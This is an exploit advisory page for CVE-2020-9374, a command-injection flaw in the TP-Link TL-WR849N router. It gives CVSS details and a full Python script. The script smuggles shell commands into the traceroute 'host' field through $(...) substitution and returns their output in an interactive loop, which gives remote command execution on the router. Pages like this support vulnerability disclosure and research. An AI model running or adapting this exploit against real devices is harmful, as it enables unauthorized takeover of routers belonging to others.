TP-Link TL-WR849N Remote Code Execution

2020.03.03
Credit: Elber Tavares
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: TP LINK TL-WR849N - Remote Code Execution # Date: 2019-11-20 # Exploit Author: Elber Tavares # Vendor Homepage: https://www.tp-link.com/ # Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware # Version: TL-WR849N 0.9.1 4.16 # Tested on: linux, windows # CVE : CVE-2020-9374 import requests def output(headers,cookies): url = 'http://192.168.0.1/cgi?1' data = '' data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a' data += 'diagnosticsState\x0d\x0a' data += 'X_TP_HopSeq\x0d\x0a' data += 'X_TP_Result\x0d\x0a' r = requests.post(url,data=data,headers=headers,cookies=cookies) saida = r.text filtro = saida.replace(': Name or service not known','') filtro = filtro.replace('[0,0,0,0,0,0]0','') filtro = filtro.replace('diagnosticsState=','') filtro = filtro.replace('X_TP_HopSeq=0','') filtro = filtro.replace('X_TP_Result=','') print(filtro[:-8]) def aceppt(headers,cookies): url = 'http://192.168.0.1/cgi?7' data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' r = requests.post(url,data=data,headers=headers,cookies=cookies) output(headers,cookies) def inject(command,headers,cookies): url = 'http://192.168.0.1/cgi?2' data = '' data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a' data += 'maxHopCount=20\x0d\x0a' data += 'timeout=5\x0d\x0a' data += 'numberOfTries=1\x0d\x0a' data += 'host=\"$('+command+')\"\x0d\x0a' data += 'dataBlockSize=64\x0d\x0a' data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a' data += 'diagnosticsState=Requested\x0d\x0a' data += 'X_TP_HopSeq=0\x0d\x0a' r = requests.post(url,data=data,headers=headers,cookies=cookies) aceppt(headers,cookies) def main(): cookies = {"Authorization": "Basic REPLACEBASE64AUTH"} headers = {'Content-Type': 'text/plain', 'Referer': 'http://192.168.0.1/mainFrame.htm'} while True: command = input('$ ') inject(command,headers,cookies) main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top